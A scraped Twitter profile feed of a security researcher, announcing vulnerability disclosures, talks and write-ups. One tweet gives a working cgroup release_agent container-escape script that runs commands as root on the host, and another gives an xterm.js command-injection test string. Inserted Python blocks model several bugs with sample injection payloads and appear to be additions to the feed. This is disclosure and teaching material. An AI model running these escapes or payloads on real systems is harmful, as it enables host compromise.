Felix Wilhelm Profile
Felix Wilhelm

@_fel1x

10,770 Followers · 721 Following · 23 Media · 1,282 Statuses

Co-founder and CTO of Asymmetric Research ( @asymmetric_re )

Zürich, Switzerland
Joined November 2010
Pinned Tweet
@_fel1x
Felix Wilhelm
9 months
I’ve started a new security company together with @claudijd : Asymmetric Research ( @asymmetric_re ). If you are a strong security engineer or researcher interested in defending and breaking some of the biggest DeFi and Blockchain projects, we’d love to
7
10
104
@_fel1x
Felix Wilhelm
3 years
I stumbled upon a fun heap overflow in Github's markdown rendering library. RCE via a malicious README 🤔 Demonstrates the risk of memory unsafe dependencies used by scripting languages.
8
210
819
@_fel1x
Felix Wilhelm
4 years
You might want to update your F5 BIG-IP appliances: . and are two data-plane bugs that got fixed.
13
344
752
@_fel1x
Felix Wilhelm
2 years
Slides for my SAML talk at @hexacon_fr are now online: . Includes details of CVE-2022-34169, a fun JIT bug that you should check out.
7
184
620
@_fel1x
Felix Wilhelm
5 years
My writeup for the haproxy http2 bug (CVE-2020-11100) is now public: . Includes a PoC exploit to demonstrate RCE against Ubuntu 19.10.
4
239
604
@_fel1x
Felix Wilhelm
3 years
My report for this bug is now public: . Thanks @github for donating a 40000$ bounty to Médecins Sans Frontières ()
@_fel1x
Felix Wilhelm
3 years
I stumbled upon a fun heap overflow in Github's markdown rendering library. RCE via a malicious README 🤔 Demonstrates the risk of memory unsafe dependencies used by scripting languages.
8
210
819
7
118
569
@_fel1x
Felix Wilhelm
6 years
CVE-2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivatives: . Exploit fits in a tweet so you should patch as soon as possible.
11
510
551
@_fel1x
Felix Wilhelm
4 years
Enter the Vault: Authentication Issues in HashiCorp Vault
9
226
522
@_fel1x
Felix Wilhelm
7 years
Happy to hear that Windows is secure again now that MS patched the last remaining bug in their unsandboxed, system-privileged JS runtime.
8
226
502
@_fel1x
Felix Wilhelm
5 years
# Privileged container only: needs the cgroup v1 fs writable. $d = first hierarchy that exposes a release_agent file.
d=`dirname $(ls -x /s*/fs/c*/*/r* | head -n1)`
# Child cgroup that tells the kernel to run the release agent once it becomes empty.
mkdir -p $d/w; echo 1 >$d/w/notify_on_release
# Host-side path of this container's overlay upperdir, taken from the mount options.
t=`sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab`
# The agent runs as root on the host: point it at /c (host path $t/c), which runs "$1" and writes the output into the container's /o.
touch /o; echo $t/c >$d/release_agent
echo "#!/bin/sh
$1 >$t/o" >/c; chmod +x /c
# Put a short-lived shell into the child cgroup; when it exits the cgroup is empty and the host executes $t/c.
sh -c "echo 0 >$d/w/cgroup.procs"; sleep 1; cat /o
10
153
501
@_fel1x
Felix Wilhelm
3 years
An EPYC escape: Case-study of a KVM breakout
9
215
509
@_fel1x
Felix Wilhelm
3 years
weggli, my attempt at writing a fast and robust semantic search tool for C and C++ code is now open source: . Please take a look and let me know what you think.
15
136
486
@_fel1x
Felix Wilhelm
2 years
If you perform SAML auth in Java you should make sure you patched . RCE during signature verification. Blogpost coming soon™.
5
127
384
@_fel1x
Felix Wilhelm
3 years
AWS fixed a terminal escape injection in AWS CloudShell. The bug could have resulted in a full account compromise if an admin views malicious logs or external data using CloudShell:
2
95
327
@_fel1x
Felix Wilhelm
5 years
Quick and dirty way to get out of a privileged k8s pod or docker container by using cgroups release_agent feature.
6
118
328
@_fel1x
Felix Wilhelm
6 years
CVE-2019-7221 is a pretty nice guest-triggerable use-after-free in KVM () and CVE-2019-7222 is an info leak to help with exploitation ().
3
156
260
@_fel1x
Felix Wilhelm
5 years
Super excited about joining the team :)
@benhawkes
Ben Hawkes
5 years
We're excited to welcome Felix Wilhelm ( @_fel1x ) to Project Zero today!
20
18
307
26
6
254
@_fel1x
Felix Wilhelm
4 years
is an interesting design flaw in Github Actions. Actions that print untrusted data to STDOUT are vulnerable to an injection attack that can be turned into code exec.
6
80
227
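The design flaw in the tweet above, modelled as an added example (this is not GitHub's runner code and not code from the author): a runner that scans every stdout line for workflow commands lets attacker-controlled output such as an issue title set environment variables for later steps, while a runner that honours ::stop-commands::TOKEN treats everything between the token lines as plain text. The command syntax (::set-env, ::add-path, ::stop-commands) follows GitHub's documented format; the runner models, the issue title and the NODE_OPTIONS payload are constructed for this example.

```python
import re
import secrets

# ::name key=value,key2=value2::payload   (GitHub's documented workflow-command syntax)
_CMD = re.compile(r"^::([a-z-]+)(?:\s+([^:]*))?::(.*)$")


def parse_command(line):
    """Return (name, properties, payload) if the line is a workflow command, else None."""
    m = _CMD.match(line)
    if not m:
        return None
    name, props, payload = m.group(1), m.group(2) or "", m.group(3)
    props = dict(p.split("=", 1) for p in props.split(",") if "=" in p)
    return name, props, payload


def apply_command(name, props, payload, env):
    """The two commands that turned stdout injection into code execution on old runners:
    set-env could plant variables such as NODE_OPTIONS for later steps, add-path could put
    an attacker-controlled directory first in PATH."""
    if name == "set-env" and "name" in props:
        env[props["name"]] = payload
    elif name == "add-path":
        env["PATH"] = payload + ":" + env.get("PATH", "")


def run_step_output(lines, env):
    """Vulnerable runner model: every stdout line is a potential command."""
    env = dict(env)
    for line in lines:
        cmd = parse_command(line)
        if cmd:
            apply_command(*cmd, env)
    return env


def run_step_output_safe(lines, env):
    """Hardened runner model: ::stop-commands::TOKEN suspends command parsing until the
    matching ::TOKEN:: line. Everything in between is plain text."""
    env = dict(env)
    stop_token = None
    for line in lines:
        if stop_token is not None:
            if line == f"::{stop_token}::":
                stop_token = None
            continue
        cmd = parse_command(line)
        if not cmd:
            continue
        name, props, payload = cmd
        if name == "stop-commands":
            stop_token = payload
        else:
            apply_command(name, props, payload, env)
    return env


def emit_untrusted(text):
    """What an action should do with data it does not control: bracket it with a
    one-time random token so nothing inside can be parsed as a command."""
    token = secrets.token_hex(16)
    return [f"::stop-commands::{token}", *text.splitlines(), f"::{token}::"]


# Constructed sample: an attacker-chosen issue title that an action echoes to stdout.
ISSUE_TITLE = "Typo in README\n::set-env name=NODE_OPTIONS::--require /tmp/evil.js"


def demo():
    """Returns the NODE_OPTIONS value seen by later steps under both runner models."""
    base = {"PATH": "/usr/bin"}
    naive = run_step_output(ISSUE_TITLE.splitlines(), base)
    safe = run_step_output_safe(emit_untrusted(ISSUE_TITLE), base)
    return naive.get("NODE_OPTIONS"), safe.get("NODE_OPTIONS")


if __name__ == "__main__":
    print(demo())
```

The token must be unpredictable and generated per step: a fixed or guessable token can simply be echoed by the attacker to re-enable command parsing. Current runners additionally refuse set-env and add-path altogether in favour of the GITHUB_ENV and GITHUB_PATH files, which untrusted stdout cannot reach.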
@_fel1x
Felix Wilhelm
6 years
CVE-2019-0542 is a RCE bug due to insecure terminal escape sequence handling in xterm.js (an xterm rewrite in javascript). Affects vscode and azure cloud shell (cc @teh_gerg :))
3
104
213
@_fel1x
Felix Wilhelm
4 years
The list of projects compromised by the codecov hack is pretty scary: (see )
@ryanaraine
Ryan Naraine
4 years
Another significant software supply chain hack: Codecov Bash Uploader breach went undetected for four months as attackers stole credentials, tokens and keys from orgs around the world
4
81
124
3
135
207
@_fel1x
Felix Wilhelm
3 years
is a (surprisingly easy) bug in containerd that allows a malicious container to read host files. It’s an interesting issue because it will work even if the container is sandboxed with gvisor or firecracker.
5
63
192
@_fel1x
Felix Wilhelm
5 years
🤵🏻👰🏼
44
2
178
@_fel1x
Felix Wilhelm
2 years
New year, new job, new bugs. Published a write-up about an interesting integer overflow issue in BNB Chain, the 4th largest blockchain.
@jump_
Jump Crypto 🔥💃🏻
2 years
We are now sharing the technical write-up of the vulnerability in @bnbchain that @_fel1x (a security researcher at @jump_ ) discovered and responsibly disclosed earlier this week:
27
50
445
11
20
173
@_fel1x
Felix Wilhelm
2 years
Another SAML bug to wrap up the year: .
2
46
172
@_fel1x
Felix Wilhelm
9 years
Slides for my @44CON talk about FireEye: #playingwithfire
5
228
153
@_fel1x
Felix Wilhelm
6 years
Found a nice bug in KVM's nested virtualization functionality:
0
88
153
@_fel1x
Felix Wilhelm
9 years
Slides for my #TR16 talk about Palo Alto firewalls:
5
88
151
@_fel1x
Felix Wilhelm
5 years
Fun bug in git: . Newline injection in the credential helper protocol can be used to exfiltrate credentials during a git clone.
4
66
146
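The credential-helper newline injection from the tweet above as an added example (not git's code and not the author's): git describes a URL to its credential helper as key=value lines terminated by a blank line, so a newline that survives inside the host value becomes a second host= line and a helper that takes the last value answers for the wrong host. The pre-fix URL parsing model, the credential store and the helper are constructed for this example; the check in serialize_hardened mirrors the fix, which refuses to send any value containing a newline.

```python
from urllib.parse import unquote


def credential_fields_old_git(url):
    """Model (constructed for this example) of how git derived the credential context
    from a URL before the fix: the host is everything between '://' and the first '/',
    and percent-escapes in it are decoded. A %0a in that span therefore becomes a raw
    newline inside the host value."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("not a URL")
    host, _, _path = rest.partition("/")  # path is only sent with credential.useHttpPath
    return {"protocol": scheme, "host": unquote(host)}


def serialize_vulnerable(fields):
    """Credential protocol as written to the helper's stdin: key=value lines, blank line ends."""
    return "".join(f"{k}={v}\n" for k, v in fields.items()) + "\n"


def serialize_hardened(fields):
    """The fix: refuse to emit a value containing a newline, since the helper would
    parse the remainder as further key=value lines."""
    for k, v in fields.items():
        if "\n" in v or "\r" in v:
            raise ValueError(f"credential value for {k} contains newline")
    return serialize_vulnerable(fields)


def helper_get(request, store):
    """A constructed credential helper's 'get' action: parse the request (last value
    for a key wins) and answer with the stored credential for that host."""
    attrs = {}
    for line in request.split("\n"):
        if line == "":
            break
        key, _, value = line.partition("=")
        attrs[key] = value
    return store.get(attrs.get("host"))


# Constructed credential store, as a helper might keep it.
STORE = {"one.example.com": "token-for-one", "two.example.com": "token-for-two"}
# Constructed malicious clone URL: the %0a smuggles a second host= line into the request.
MALICIOUS_URL = "https://one.example.com?%0ahost=two.example.com/"


def demo():
    """Returns (credential leaked by the vulnerable path, whether the hardened path refused)."""
    fields = credential_fields_old_git(MALICIOUS_URL)
    leaked = helper_get(serialize_vulnerable(fields), STORE)
    try:
        serialize_hardened(fields)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The same line-oriented protocol is spoken by every credential helper, so the check belongs on the git side where the values are produced; a helper cannot tell an injected host= line from a real one.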
@_fel1x
Felix Wilhelm
4 years
Apache 2.4.46 has fixes for three vulnerabilities I reported () The http2 push diary bug is the most interesting one: Depending on your distro's mod_http2 version it is either a wild memmove or a controlled OOB write ()
3
49
145
@_fel1x
Felix Wilhelm
7 years
Turns out musl had a stack based buffer overflow in getaddrinfo(): ¯\_(ツ)_/¯
@thegrugq
thaddeus e. grugq
9 years
glibc has a stack based buffer overflow in getaddrinfo(). When with @musllibc have full feature parity??
2
8
28
3
82
139
@_fel1x
Felix Wilhelm
2 years
Another fun bug reachable via SAML: . Arbitrary file read during XML signature verification in .NET.
0
33
138
@_fel1x
Felix Wilhelm
3 years
runc: insecure handling of bind mount sources . Incorrect handling of null-bytes and an integer overflow during message serialization. Good example of the type of bugs you can find in low-level Go code.
2
43
131
@_fel1x
Felix Wilhelm
2 years
is a heap-buffer-overflow in libxml2 for very large inputs. Easy to trigger when you can run XSLT. Another example of a bug that's hard to fuzz but easy to find manually.
2
41
133
@_fel1x
Felix Wilhelm
6 years
What could go wrong...
6
75
124
@_fel1x
Felix Wilhelm
2 years
Gregor Samsa: Exploiting Java's XML Signature Verification
10
63
122
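The XML signature bugs in the tweets above (XSLT executed during verification in Java, file read during verification in .NET) share a root cause: the verifier dereferences and transforms the signed data before it knows whether the signature is genuine. An added example of the pre-check a SAML service provider can run before handing a response to its signature library (this is not code from the author or from any SAML library): allow only the transforms SAML needs and only same-document Reference URIs. The sample responses are constructed and carry no valid signature; that is the point, the check runs before any cryptography.

```python
import xml.etree.ElementTree as ET

DS = "{http://www.w3.org/2000/09/xmldsig#}"

# Transforms a SAML verifier actually needs. Anything else, XSLT above all, is rejected
# before the document reaches the signature library, because the library executes the
# transforms while verifying, i.e. before it knows whether the signature is genuine.
ALLOWED_TRANSFORMS = {
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
}
XSLT_TRANSFORM = "http://www.w3.org/TR/1999/REC-xslt-19991116"


def disallowed_transforms(xml_bytes):
    """Algorithm URIs of every ds:Transform that is not on the allowlist."""
    root = ET.fromstring(xml_bytes)
    return [t.get("Algorithm", "") for t in root.iter(DS + "Transform")
            if t.get("Algorithm", "") not in ALLOWED_TRANSFORMS]


def disallowed_references(xml_bytes):
    """Reference URIs that are not same-document. SAML signs elements by ID ("#id");
    an absolute URI asks the verifier to fetch something outside the message."""
    root = ET.fromstring(xml_bytes)
    return [r.get("URI") for r in root.iter(DS + "Reference")
            if not (r.get("URI", "") == "" or r.get("URI", "").startswith("#"))]


def safe_to_verify(xml_bytes):
    return not disallowed_transforms(xml_bytes) and not disallowed_references(xml_bytes)


def _response(extra_transform="", uri="#_r1"):
    """Constructed minimal SAML response with a (bogus) enveloped signature."""
    return f"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_r1">
  <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
    <ds:SignedInfo>
      <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
      <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
      <ds:Reference URI="{uri}">
        <ds:Transforms>
          <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
          {extra_transform}
        </ds:Transforms>
        <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
        <ds:DigestValue>AAAA</ds:DigestValue>
      </ds:Reference>
    </ds:SignedInfo>
    <ds:SignatureValue>AAAA</ds:SignatureValue>
  </ds:Signature>
</samlp:Response>""".encode()


BENIGN = _response('<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>')
# An XSLT transform: a verifier that honours it runs the stylesheet before checking anything.
MALICIOUS_XSLT = _response(
    f'<ds:Transform Algorithm="{XSLT_TRANSFORM}">'
    '<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">'
    '<xsl:template match="/"><xsl:value-of select="\'runs-during-verification\'"/></xsl:template>'
    '</xsl:stylesheet></ds:Transform>')
# A Reference that points outside the document instead of at a signed element.
EXTERNAL_REF = _response(uri="file:///etc/passwd")


if __name__ == "__main__":
    for name, doc in [("benign", BENIGN), ("xslt", MALICIOUS_XSLT), ("external", EXTERNAL_REF)]:
        print(name, safe_to_verify(doc), disallowed_transforms(doc), disallowed_references(doc))
```

For real input parse with defusedxml (or an equivalently hardened parser) rather than xml.etree directly; xml.etree is used here only because the samples are constructed. The check is deliberately an allowlist: XPath and XPath Filter 2 transforms are not needed by SAML either and also change what ends up being digested.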
@_fel1x
Felix Wilhelm
7 years
If you use evince you should upgrade: drive-by RCE due to a cmd injection in their comic book handler ¯\_(ツ)_/¯
5
103
117
@_fel1x
Felix Wilhelm
4 years
"Executing Some Instructions May Cause Unpredictable Behavior" is a great summary for the state of IT security in 2020 (from ).
2
47
116
@_fel1x
Felix Wilhelm
2 years
New blog post about an Ethermint vulnerability I discovered: . This is a good example of how complex interactions between different Cosmos modules can lead to vulnerabilities.
3
25
115
@_fel1x
Felix Wilhelm
8 years
small teaser for my current spare-time project: breaking hypervisor (K)ASLR with hardware timing attacks :)
6
65
99
@_fel1x
Felix Wilhelm
3 years
is a powerful KVM OOB read/write that can be exploited by AMD SEV-ES guests.
2
26
99
@_fel1x
Felix Wilhelm
6 years
Slides from my DHCP talk at @kiwicon and @HITBSecConf are now online: #HITB2018DXB #kiwicon
0
49
94
@_fel1x
Felix Wilhelm
8 months
First post on the Asymmetric Research blog. A critical bug in Polygon's Heimdall validator that put over $2B of crypto assets at risk.
@asymmetric_re
asymmetric research
8 months
New blog post: Ethereum Log Confusion in Polygon's Heimdall. A critical vulnerability in Polygon PoS that could have allowed a rogue validator to take over the Heimdall consensus layer, putting over $2B of crypto assets in the PoS bridge at risk.
4
25
112
4
15
84
@_fel1x
Felix Wilhelm
3 years
The bug is also a good example for an issue that's hard to find with a fuzzer (due to the size requirement), but easy to spot during code review.
2
4
74
@_fel1x
Felix Wilhelm
4 years
I found an arbitrary file write in (part of Sublime's Package Control) extension: . Super impressive response time by @wbond
1
12
74
@_fel1x
Felix Wilhelm
4 years
I reported two interesting issues in usrsctp, which are now fixed: and . Take a look at @natashenka's amazing blog series on Android messenger exploitation to see why you should care about usrsctp:
0
24
66
@_fel1x
Felix Wilhelm
4 years
Node.js fixed an interesting TLS session caching bug: . Multiple HTTPS requests to the same host can bypass hostname verification by reusing an invalid TLS session.
0
24
61
@_fel1x
Felix Wilhelm
6 years
Got a #pwnie nomination for CVE-2018-1111 \o/
2
8
61
@_fel1x
Felix Wilhelm
7 years
ISC patched two interesting bugs in their DHCP codebase: A global buffer overflow triggerable over DHCPv6 and a refcount overflow -> use-after-free bug in their option parsing: and
1
36
56
@_fel1x
Felix Wilhelm
4 years
Node.js patched an easy to trigger UaF in their TLS implementation: . Seems very hard to exploit against Current on Linux, but other version-OS combinations might be doable.
0
21
54
@_fel1x
Felix Wilhelm
9 years
Blogpost about some interesting double fetch vulnerabilities I discovered in Xen: #XSA155
0
62
50
@_fel1x
Felix Wilhelm
6 years
XSA-270 is a pretty straight-forward integer overflow in xen-netback. The feature is only used by Windows guests running Citrix guest drivers but it's enabled by default and can be triggered from both HVM and PV guests:
1
30
51
@_fel1x
Felix Wilhelm
2 years
@tgraf__ Tetragon looks cool, but I think the blog post should be more transparent about its limitations. The CVE-2021-22555 example isn't mitigating the bug, it's blocking the exploit _after_ it already achieved kernel code execution. It's very easy to bypass policies like this.
4
6
53
@_fel1x
Felix Wilhelm
4 years
AWS fixed some issues in their Kubernetes IAM auth provider: . None of them are super critical, but it's another example of sts:GetCallerIdentity being hard to use securely.
0
17
51
@_fel1x
Felix Wilhelm
5 years
You might want to patch your haproxy instances:
1
18
49
@_fel1x
Felix Wilhelm
6 years
Intel is hiring a lot of smart security people lately 👍
4
1
49
@_fel1x
Felix Wilhelm
6 years
I'll be speaking about this and other results of my DHCP vulnerability research at @kiwicon in NZ and @HITBSecConf in Dubai next month. First public talks in two years :)
@_fel1x
Felix Wilhelm
6 years
systemd has its own dhcp client. Turns out it had a bug: . Results in a controlled OOB heap write.
7
107
216
1
16
48
@_fel1x
Felix Wilhelm
5 years
Nice talk on container escapes by @drraid and @0x7674 :
1
16
49
@_fel1x
Felix Wilhelm
8 years
Had a great first week at Google Zürich :)
4
2
43
@_fel1x
Felix Wilhelm
6 years
Thanks to @0dayMarketing this bug has a name, logo and theme song now: #dynoroot
2
10
43
@_fel1x
Felix Wilhelm
8 years
FreeBSD fixed a bhyve VM escape I reported a couple of months ago:
0
33
42
@_fel1x
Felix Wilhelm
8 years
Oracle patched a fun OOB write bug in the VirtualBox virtio implementation (only 2 weeks after my initial report):
2
39
41
@_fel1x
Felix Wilhelm
9 years
Slides for my Xenpwn talk from @InfiltrateCon and @SyScan : , code + WP will be published soon™
2
56
40
@_fel1x
Felix Wilhelm
11 years
A short teaser about our research on MS13-092, a rather interesting Hyper-V bug: http://t.co/6NeZoB652O
2
29
38
@_fel1x
Felix Wilhelm
9 years
Palo Alto patched a couple of bugs I reported to them: . The VPN buffer overflow is quite serious.
7
55
36
@_fel1x
Felix Wilhelm
3 years
Long time followers will notice that this is a 1:1 copy of the Azure Cloud Shell/VSCode bug I reported ~2 years ago.
@_fel1x
Felix Wilhelm
6 years
CVE-2019-0542 is a RCE bug due to insecure terminal escape sequence handling in xterm.js (an xterm rewrite in javascript). Affects vscode and azure cloud shell (cc @teh_gerg :))
3
104
213
0
3
36
@_fel1x
Felix Wilhelm
6 years
echo -e "abcdef\x1bP+qfoo;\ntouch /tmp/foo;aa\n\x1b\n" to test if your terminal emulator is using a vulnerable version of xterm.js
0
11
37
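The xterm.js and CloudShell bugs above are the same class: untrusted bytes reach a terminal emulator, and a sequence that makes the terminal answer (here the DCS +q termcap query) feeds attacker-chosen text, newlines included, back into the shell as if typed. An added example, not code from the author or from xterm.js, of the defensive side: strip control sequences from untrusted text (log lines, file names, remote output) before writing it to a terminal, and flag the query sequences that cause a reply. The sample lines are constructed; the third one is the test string from the tweet above, as given there.

```python
import re

# String-type sequences (DCS, OSC, APC, PM, SOS): ESC P/]/_/^/X ... terminated by ST (ESC \) or BEL.
_STRING_SEQ = re.compile(r"\x1b[P\]_^X].*?(?:\x1b\\|\x07)", re.S)
# An attacker may omit the terminator; then the sequence runs to the end of the input.
_OPEN_STRING_SEQ = re.compile(r"\x1b[P\]_^X].*$", re.S)
# Control Sequence Introducer: ESC [ parameter bytes, intermediate bytes, final byte.
_CSI = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]")
# Any remaining two-byte escape (ESC + one char).
_ESC2 = re.compile(r"\x1b[@-Z\\-_]")
# Remaining C0 controls except tab and newline (CR included: it overwrites the line), DEL and C1.
_CTRL = re.compile(r"[\x00-\x08\x0b-\x1f\x7f\x80-\x9f]")


def strip_terminal_controls(text):
    """Return text with every escape sequence and control character removed,
    keeping only tab and newline."""
    text = _STRING_SEQ.sub("", text)
    text = _OPEN_STRING_SEQ.sub("", text)
    text = _CSI.sub("", text)
    text = _ESC2.sub("", text)
    return _CTRL.sub("", text)


def has_terminal_query(text):
    """True if the text contains a sequence that makes common terminals reply and thereby
    inject bytes into the shell's input: DCS +q (XTGETTCAP termcap query), OSC 52
    (clipboard access), DA (ESC [ c / ESC [ > c / ESC [ = c) and DSR/CPR (ESC [ 5 n, ESC [ 6 n)."""
    return bool(re.search(r"\x1bP\+q|\x1b\]52;|\x1b\[(?:>|=)?c|\x1b\[[56]n", text))


# Constructed sample lines as they might arrive from a log or a remote host.
SAMPLE_LINES = [
    "GET /index.html 200",
    "GET /\x1b[31mred\x1b[0m.html 404",                  # harmless colour codes
    "abcdef\x1bP+qfoo;\ntouch /tmp/foo;aa\n\x1b\n",      # the xterm.js test string from the tweet above
    "user=\x1b]52;c;?\x07",                               # OSC 52 clipboard read request
]


def triage(lines):
    """For each line: (did it contain a reply-triggering query, sanitized text)."""
    return [(has_terminal_query(line), strip_terminal_controls(line)) for line in lines]


if __name__ == "__main__":
    for flagged, clean in triage(SAMPLE_LINES):
        print("QUERY " if flagged else "      ", repr(clean))
```

Stripping is the only safe default for data you merely display; if colour codes must survive, allow exactly the SGR subset (ESC [ ... m) and nothing else. The detector exists for the cases where the bytes are already stored (logs, CloudShell history) and the question is whether someone has been trying to get a terminal to talk back.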
@_fel1x
Felix Wilhelm
9 years
Cool technique to bypass Bitlocker in TPM only mode:
0
32
34
@_fel1x
Felix Wilhelm
8 years
Xenpwn got accepted at #BHUSA : ! See you in Vegas :)
7
12
35
@_fel1x
Felix Wilhelm
8 years
After 4 years, today was my last day at ERNW. Had a great time and learned a lot. Thank you all!
6
3
34
@_fel1x
Felix Wilhelm
2 years
A really fun Zoom 0-click RCE by @ifsecure
@ifsecure
Ivan Fratric 💙💛
2 years
How do you do, fellow kids. I hear 0-click exploits are "cool" this season, so allow me to present my take on that :). And when I say "present", I will actually be presenting more details on this type of attacks at @BlackHatEvents in August.
2
56
244
0
5
32
@_fel1x
Felix Wilhelm
10 years
Published a small writeup about the recent vulns in the Xen x86 emulation code: http://t.co/9ArRfRpEHb
1
36
31
@_fel1x
Felix Wilhelm
1 year
We published a writeup about a fun Cosmos / IBC bug. An attacker could trigger emission of events even though the corresponding state changes aren't committed.
@jump_
Jump Crypto 🔥💃🏻
1 year
Our security team recently found a vulnerability in ibc-go, the reference implementation of the Interblockchain Communication Protocol (IBC) used by most @Cosmos blockchains.
71
62
279
2
7
30
@_fel1x
Felix Wilhelm
9 years
Please read our (updated) blog post regarding the FireEye disclosure: . It should clear up some misunderstandings.
2
44
28
@_fel1x
Felix Wilhelm
4 years
Watching @_tsuro go from "hardware bugs are way out of my comfort zone" to in <18 months is super impressive :)
@_tsuro
stephen
4 years
I made a website:
12
305
971
1
1
29
@_fel1x
Felix Wilhelm
8 years
This task_t bug class by Ian Beer is hilarious: . Really great research!
1
21
28
@_fel1x
Felix Wilhelm
6 years
Dan Carpenter found a super simple out-of-bounds access in the KVM 'send IPI' hypercall: . Was introduced a month ago so it shouldn't affect too many real world deployments:
0
21
26
@_fel1x
Felix Wilhelm
9 years
REDSHIFT: 105k$ for Flash Vuln + PrivEsc. Finally some real prices available ;)
1
40
26
@_fel1x
Felix Wilhelm
8 years
QEMU patched a dir traversal I reported in virtfs/9p: Might allow host breakout from KVM guests that use VirtFS.
0
33
22
@_fel1x
Felix Wilhelm
8 years
Just realized I got credits for a Hyper-V RCE (CVE-2017-0162) patched in the latest update :).
4
4
23
@_fel1x
Felix Wilhelm
10 years
Sendmail crackaddr - Static Analysis strikes back: http://t.co/sp4cnAQ1mi
2
14
23
@_fel1x
Felix Wilhelm
8 years
Talk went well :) #BHUSA
5
2
23
@_fel1x
Felix Wilhelm
9 years
FireEye released a security notice regarding the topic of my upcoming @44CON talk: #44CON #playingwithfire
3
36
23
@_fel1x
Felix Wilhelm
9 years
XSA-148, or how to own Amazon EC2 for the last 7 years.
5
34
21
@_fel1x
Felix Wilhelm
6 years
Had a great time at #Kiwicon . Highly recommended :)
1
0
22
@_fel1x
Felix Wilhelm
9 years
FireEye released a customer notice regarding some vulns I reported: . You should probably patch immediately..
0
21
20
@_fel1x
Felix Wilhelm
2 years
Featuring weggli 🙂
@pwningsystems
Jordy Zomer
2 years
Earlier this year I found a vulnerability in Apple's kernel (XNU) and I decided to write a blog-post about it. I hope this is useful to some of you! 😁 #apple
8
93
361
0
1
21
@_fel1x
Felix Wilhelm
6 years
🙈
@jpdanner
Jason Danner
6 years
I'm enjoying the gesticulating. #Kiwicon
1
0
3
4
0
21
@_fel1x
Felix Wilhelm
2 years
I’m in Vegas till Sunday. If you see me say hi!
1
0
21
@_fel1x
Felix Wilhelm
4 years
A successful exploit would give an attacker write access to the repo and access to all encrypted secrets used by the workflow.
0
3
20
@_fel1x
Felix Wilhelm
9 years
SSL VPN remote root exploit for my #TR16 talk is working :) MIPS64 ROP turns out to be quite time consuming!
3
13
20
@_fel1x
Felix Wilhelm
10 years
Big IDA leak: http://t.co/keeRmL3P4L (Fraunhofer-Institut, Kaspersky, Microsoft, TrendMicro, RSA..)
2
27
20